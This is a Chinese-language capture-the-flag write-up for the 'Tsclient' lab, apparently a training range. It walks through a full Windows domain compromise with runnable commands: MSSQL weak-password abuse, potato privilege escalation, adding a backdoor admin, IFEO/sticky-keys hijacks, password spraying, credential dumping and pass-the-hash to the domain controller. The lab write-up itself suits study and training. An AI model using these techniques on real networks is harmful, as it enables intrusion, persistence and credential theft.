春秋云境 Tsclient

依旧白嫖

Tsclient是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag，分布于不同的靶机。

前置知识:

内网渗透学习(代理篇)
域渗透学习(NTLM篇)
windows提权笔记

入口（172.22.8.18）

访问主机，是一个iis页面，没有明显的框架和服务可以利用

扫描端口

fscan.exe -h 39.99.147.95

开启了mssql服务，同时爆出了弱口令 sa/1qaz!QAZ

MDUT连接上，激活xpcmdshell组件执行命令，发现权限较低

上传 SweetPotato 提权

提权后上线cs

得到flag1：flag{9147508f-baf0-4602-b4b2-3fe74b39fb86}
和一个hint：Maybe you should focus on user sessions...

内网

然后收集信息

ip是172.22.8.18

还有一个用户john，恰巧在线

quser || qwinst 命令查看在线用户

根据提示使用cs的进程注入，上线John

查看网络连接状态

查看共享内容，得到一个密码和hint

xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

Do you know how to hijack Image?

这里为了操作方便创建了一个用户来远程登录windows

net user dr0n1 Qwer1234! /add
net localgroup administrators dr0n1 /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

上传fscan扫c段

172.22.8.15:3389 open
172.22.8.31:3389 open
172.22.8.46:3389 open
172.22.8.18:3389 open

172.22.8.15 XIAORANG\DC01 # 域控
172.22.8.31 XIAORANG\WIN19-CLIENT
172.22.8.46 WIN2016.xiaorang.lab
172.22.8.18 WIN-WEB # 本机

构建代理

C:\a>iox.exe proxy -l 5588

域主机（172.22.8.46）

这里主机不多，使用rdesktop一个一个尝试登录，登录46时会提示密码过期需要修改，改完就能登上了

proxychains4 rdesktop 172.22.8.46

xiaorang\Aldrich
Ald@rLMWuy7Z!#

---

看网上的wp是说可以用crackmapexec喷洒密码

proxychains4 crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#' -d xiaorang.lab 2>/dev/null

然后有提示STATUS_PASSWORD_EXPIRED 就是密码过期了，需要使用smbpasswd进行修改密码

python3 smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'Qwer1234!'

---

根据前面的提示 hijack Image

rdp登上后先查看权限，发现所有正常登录的用户都可以修改注册表

get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *

修改注册表，把主页的放大镜(magnify.exe)替换成C:\windows\system32\cmd.exe，这样就直接提权成system了

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

# 粘滞键方式，五次shift触发
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

锁屏后点击右小角的放大镜

就直接是system权限了，然后触发提前准备好的马(cs 转发上线)

上线cs，拿到flag2

域控（172.22.8.15）

查看域管成员

shell net group "domain admins" /domain

logonpaswords抓到win2016$的哈希

logonpasswords

pth域控，拿到flag3

proxychains4 crackmapexec smb 172.22.8.15 -u WIN2016$ -H b3b4f52af6fdf3105ee5c04215755ff4 -d xiaorang -x "type C:\Users\Administrator\flag\flag03.txt"